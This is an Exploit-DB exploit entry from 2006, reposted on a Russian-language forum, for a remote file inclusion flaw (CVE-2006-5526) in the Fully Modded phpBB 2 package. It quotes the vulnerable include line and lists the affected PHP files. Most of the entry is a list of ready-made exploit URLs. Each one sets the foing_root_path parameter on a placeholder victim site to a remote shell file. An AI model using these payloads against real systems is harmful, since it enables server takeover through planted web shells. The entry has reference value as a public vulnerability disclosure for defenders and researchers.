- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 2621
- Проверка EDB
-
- Пройдено
- Автор
- 020
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2006-5526
- Дата публикации
- 2006-10-23
Код:
##############################################################
Fully Modded phpBB 2 Remote File Include [PHPBB] Exploit (2)
##############################################################
Source Code:
http://phpbbfm.net/support/index_fm.php
http://kent.dl.sourceforge.net/sourceforge/phpbbfm/FM2021-4-40.tar.gz
###################################################
Vulnerable Code:_
include('includes/common.php');
$phpbb_root_path = $foing_root_path . $phpbb_root_path;
In
./faq.php
./index.php
./list.php
./login.php
./playlist.php
./song.php
./gen_m3u.php
./view_artist.php
./view_song.php
./flash/set_na.php
./flash/initialise.php
./flash/get_song.php
./includes/common.php
./admin/nav.php
./admin/main.php
./admin/list_artists.php
./admin/index.php
./admin/genres.php
./admin/edit_artist.php
./admin/edit_album.php
./admin/config.php
./admin/admin_status.php
###################################################
Exploit :
http://www.vicTim.com/[player]/faq.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/index.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/list.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/login.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/playlist.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/song.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/gen_m3u.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/view_artist.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/view_song.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/login.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/playlist.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/song.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/flash/set_na.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/flash/initialise.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/flash/get_song.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/includes/common.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/admin/nav.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/admin/main.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/admin/list_artists.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/admin/index.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/admin/genres.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/admin/edit_artist.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/admin/edit_album.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/admin/config.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/admin/admin_status.php?foing_root_path=sh3ll.txt?
###################################################
Discoverd By : 020
###################################################
Special Greetings :_ Tryag-Team & 4lKaSrGoLd3n-Team > WwW.DwRaT.CoM & WwW.Tryag.CoM & WwW.Xp020.CoM
###################################################
# milw0rm.com [2006-10-23]
- Источник
- www.exploit-db.com